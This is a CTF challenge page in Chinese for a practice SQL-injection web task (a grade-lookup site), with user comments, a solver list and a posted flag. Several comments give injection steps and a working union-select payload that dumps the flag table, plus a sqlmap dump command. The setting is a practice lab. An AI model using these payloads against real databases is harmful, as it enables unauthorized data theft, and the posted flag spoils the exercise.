成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 11823
提  示:
描  述:
来源山科大ctf
评论
脚本小子admin 1年前

1.判断为字符型,单引号闭合,语句:1' and 1=1 #(正常显示) 和 1' and 1=2 (不显示)# 2.order by 判断数量 3.union 联合注入

回复 1

wugan777 1年前

flag{0ae5f6b4af2192ee4dc59b22f0498715}

回复 1

爱莉希雅 1年前

1' and 1=2 union select 1,2,3,skctf_flag from fl4g# 打出就行

回复 4
fwsw 1年前

@17776194915 练习联合查询注入的,要是为了完成也可以sqlmap跑

回复 0

17776194915 1年前

有流程吗大佬

回复 0

2448556817 1年前

dabudai

回复 0

19219659971 1年前

从fl4g里面导出了flag,但说flag错误?

回复 1

134679852d9e5 1年前

启动环境以后网页打不开啊。啊啊啊啊啊!!!!! 退钱!

回复 4

canxue2024 1年前

sqlmap一把梭哈

回复 1

toto 1年前

环境用不了服了smg

回复 0

toto 1年前

环境用不了服了smg

回复 0

use 2年前

--batch -D skctf --dump

回复 0

WriteUp

image
harry

2 金币

评分(24)

解题动态

L! 攻破了该题 5小时前
box 攻破了该题 8小时前
911 攻破了该题 18小时前
LHM 攻破了该题 19小时前
yue 攻破了该题 19小时前
HZ 攻破了该题 19小时前
wyc 攻破了该题 19小时前
小蓝01 攻破了该题 19小时前
wh 攻破了该题 19小时前
diffni 攻破了该题 19小时前
dianci 攻破了该题 19小时前
cww 攻破了该题 19小时前
qyy 攻破了该题 19小时前
ghj 攻破了该题 19小时前
_T_ 攻破了该题 19小时前
lkgjlkglkw 攻破了该题 20小时前
popppyy 攻破了该题 20小时前
hyxi 攻破了该题 20小时前
Pisces_11z 攻破了该题 20小时前
jay cat 攻破了该题 20小时前
问题反馈